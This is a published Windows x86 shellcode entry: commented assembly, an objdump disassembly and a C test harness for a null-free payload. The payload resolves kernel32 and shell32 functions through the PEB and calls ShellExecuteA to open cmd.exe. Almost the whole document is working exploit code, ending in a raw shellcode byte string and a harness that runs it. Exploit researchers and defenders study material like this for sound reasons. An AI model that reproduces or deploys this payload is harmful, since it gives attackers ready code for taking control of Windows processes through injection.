/*
# Title : Windows x86 ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) shellcode
# Date : 22-06-2016
# Author : Roziul Hasan Khan Shifat
# Tested on : Windows 7,10 x86
*/
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;EAX=PEB
mov eax,[eax+0xc] ;EAX=PEB->Ldr
mov esi,[eax+0x14] ;ESI=PEB->Ldr.InMemOrderModuleList
lodsd ; EAX=ntdll.dll
xchg eax,esi ;EAX=ESI , ESI=EAX
lodsd ; EAX=Third(kernel32)
mov ebx,[eax+0x10] ;PVOID Dllbase (base address)
;-------------------------------
mov edx,[ebx+0x3c] ;(kernel32.dll base address+0x3c)=DOS->e_lfanew
add edx,ebx ;(DOS->e_lfanew+kernel32.dll base address)=PE Header
mov edx,[edx+0x78] ;(PE Header+0x78)=DataDirectory->VirtualAddress
add edx,ebx ;(DataDirectory->VirtualAddress+kernel32.dll base address)=export table of kernel32.dll(IMAGE_EXPORT_DIRECTORY)
mov esi,[edx+0x20]; (IMAGE_EXPORT_DIRECTORY+0x20)=AddressOfNames
add esi,ebx ;ESI=(AddressOfNames+kernel32.dll base address)=kernel32 AddressOfNames
xor ecx,ecx
;-----------------------
Get_func:
inc ecx ;increment the ordinal
lodsd ;Get name offset
add eax,ebx ;(offset+kernel32.dll base adress)=Get function name
cmp dword [eax],0x50746547 ;GetP
jnz Get_func
cmp dword [eax+0x4],0x41636f72 ;rocA
jnz Get_func
cmp dword [eax+0x8],0x65726464 ;ddre
jnz Get_func
;---------------------
mov esi,[edx+0x24] ;(IMAGE_EXPORT_DIRECTORY+0x24) AddressOfNameOrdinals
add esi,ebx ;ESI=(AddressOfNameOrdinals+kernel32.dll)=AddressOfNameOrdinals of kernel32.dll
mov cx,[esi+ecx*2] ;CX=Number of Function
dec ecx
mov esi,[edx+0x1c] ; (IMAGE_EXPORT_DIRECTORY+0x1c)=AddressOfFunctions
add esi,ebx ;ESI=beginning of Address table
mov edx,[esi+ecx*4];EDX=Pointer(offset)
add edx,ebx ;Edx=GetProcAddress
;-----------------------------
xor esi,esi
mov esi,edx ;backup of GetProcAddress
xor edi,edi
mov edi,ebx
;--------------
;finding address of LoadLibraryA()
xor ecx,ecx
push ecx
push 0x41797261
push 0x7262694c
push 0x64616f4c
push esp
push ebx ;address of kernel32.dll
call edx
add esp,12
;-----------------
xor ecx,ecx
;finding address of ExitProcess
push 0x42737365
mov [esp+3],cl
push 0x636f7250
push 0x74697845
push esp
push edi
xor edi,edi
mov edi,eax
call esi
;----------------------------
add esp,12
;LoadLibraryA("shell32.dll")
xor ecx,ecx
push ecx
push 0x416c6c64
mov [esp+3],cl
push 0x2e32336c
push 0x6c656873
push esp
xor edx,edx
mov edx,edi ;Edx=LoadLibraryA
mov edi,eax ;edi=ExitProcess
call edx
add esp,11
;------------------
;finding address of ShellExecuteA()
xor ecx,ecx
push 0x42424241
mov [esp+1],cl
push 0x65747563
push 0x6578456c
push 0x6c656853
push esp
push eax
call esi
;-------------------
;ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1);
add esp,13
xor ecx,ecx
push 0x41657865
mov [esp+3],cl
push 0x2e646d63
push esp
pop ecx
xor edx,edx
inc edx
push edx
xor edx,edx
push edx
push edx
push ecx
push edx
push edx
call eax
call edi
*/
/*
Disassembly of section .text:
00401000 <_start>:
401000: 31 c9 xor %ecx,%ecx
401002: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
401006: 8b 40 0c mov 0xc(%eax),%eax
401009: 8b 70 14 mov 0x14(%eax),%esi
40100c: ad lods %ds:(%esi),%eax
40100d: 96 xchg %eax,%esi
40100e: ad lods %ds:(%esi),%eax
40100f: 8b 58 10 mov 0x10(%eax),%ebx
401012: 8b 53 3c mov 0x3c(%ebx),%edx
401015: 01 da add %ebx,%edx
401017: 8b 52 78 mov 0x78(%edx),%edx
40101a: 01 da add %ebx,%edx
40101c: 8b 72 20 mov 0x20(%edx),%esi
40101f: 01 de add %ebx,%esi
401021: 31 c9 xor %ecx,%ecx
00401023 <Get_func>:
401023: 41 inc %ecx
401024: ad lods %ds:(%esi),%eax
401025: 01 d8 add %ebx,%eax
401027: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
40102d: 75 f4 jne 401023 <Get_func>
40102f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
401036: 75 eb jne 401023 <Get_func>
401038: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
40103f: 75 e2 jne 401023 <Get_func>
401041: 8b 72 24 mov 0x24(%edx),%esi
401044: 01 de add %ebx,%esi
401046: 66 8b 0c 4e mov (%esi,%ecx,2),%cx
40104a: 49 dec %ecx
40104b: 8b 72 1c mov 0x1c(%edx),%esi
40104e: 01 de add %ebx,%esi
401050: 8b 14 8e mov (%esi,%ecx,4),%edx
401053: 01 da add %ebx,%edx
401055: 31 f6 xor %esi,%esi
401057: 89 d6 mov %edx,%esi
401059: 31 ff xor %edi,%edi
40105b: 89 df mov %ebx,%edi
40105d: 31 c9 xor %ecx,%ecx
40105f: 51 push %ecx
401060: 68 61 72 79 41 push $0x41797261
401065: 68 4c 69 62 72 push $0x7262694c
40106a: 68 4c 6f 61 64 push $0x64616f4c
40106f: 54 push %esp
401070: 53 push %ebx
401071: ff d2 call *%edx
401073: 83 c4 0c add $0xc,%esp
401076: 31 c9 xor %ecx,%ecx
401078: 68 65 73 73 42 push $0x42737365
40107d: 88 4c 24 03 mov %cl,0x3(%esp)
401081: 68 50 72 6f 63 push $0x636f7250
401086: 68 45 78 69 74 push $0x74697845
40108b: 54 push %esp
40108c: 57 push %edi
40108d: 31 ff xor %edi,%edi
40108f: 89 c7 mov %eax,%edi
401091: ff d6 call *%esi
401093: 83 c4 0c add $0xc,%esp
401096: 31 c9 xor %ecx,%ecx
401098: 51 push %ecx
401099: 68 64 6c 6c 41 push $0x416c6c64
40109e: 88 4c 24 03 mov %cl,0x3(%esp)
4010a2: 68 6c 33 32 2e push $0x2e32336c
4010a7: 68 73 68 65 6c push $0x6c656873
4010ac: 54 push %esp
4010ad: 31 d2 xor %edx,%edx
4010af: 89 fa mov %edi,%edx
4010b1: 89 c7 mov %eax,%edi
4010b3: ff d2 call *%edx
4010b5: 83 c4 0b add $0xb,%esp
4010b8: 31 c9 xor %ecx,%ecx
4010ba: 68 41 42 42 42 push $0x42424241
4010bf: 88 4c 24 01 mov %cl,0x1(%esp)
4010c3: 68 63 75 74 65 push $0x65747563
4010c8: 68 6c 45 78 65 push $0x6578456c
4010cd: 68 53 68 65 6c push $0x6c656853
4010d2: 54 push %esp
4010d3: 50 push %eax
4010d4: ff d6 call *%esi
4010d6: 83 c4 0d add $0xd,%esp
4010d9: 31 c9 xor %ecx,%ecx
4010db: 68 65 78 65 41 push $0x41657865
4010e0: 88 4c 24 03 mov %cl,0x3(%esp)
4010e4: 68 63 6d 64 2e push $0x2e646d63
4010e9: 54 push %esp
4010ea: 59 pop %ecx
4010eb: 31 d2 xor %edx,%edx
4010ed: 42 inc %edx
4010ee: 52 push %edx
4010ef: 31 d2 xor %edx,%edx
4010f1: 52 push %edx
4010f2: 52 push %edx
4010f3: 51 push %ecx
4010f4: 52 push %edx
4010f5: 52 push %edx
4010f6: ff d0 call *%eax
4010f8: ff d7 call *%edi
*/
#include<stdio.h>
#include<string.h>
char shellcode[]=\
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x89\xd6\x31\xff\x89\xdf\x31\xc9\x51\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd2\x83\xc4\x0c\x31\xc9\x68\x65\x73\x73\x42\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x54\x57\x31\xff\x89\xc7\xff\xd6\x83\xc4\x0c\x31\xc9\x51\x68\x64\x6c\x6c\x41\x88\x4c\x24\x03\x68\x6c\x33\x32\x2e\x68\x73\x68\x65\x6c\x54\x31\xd2\x89\xfa\x89\xc7\xff\xd2\x83\xc4\x0b\x31\xc9\x68\x41\x42\x42\x42\x88\x4c\x24\x01\x68\x63\x75\x74\x65\x68\x6c\x45\x78\x65\x68\x53\x68\x65\x6c\x54\x50\xff\xd6\x83\xc4\x0d\x31\xc9\x68\x65\x78\x65\x41\x88\x4c\x24\x03\x68\x63\x6d\x64\x2e\x54\x59\x31\xd2\x42\x52\x31\xd2\x52\x52\x51\x52\x52\xff\xd0\xff\xd7";
main()
{
printf("shellcode length %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();
}
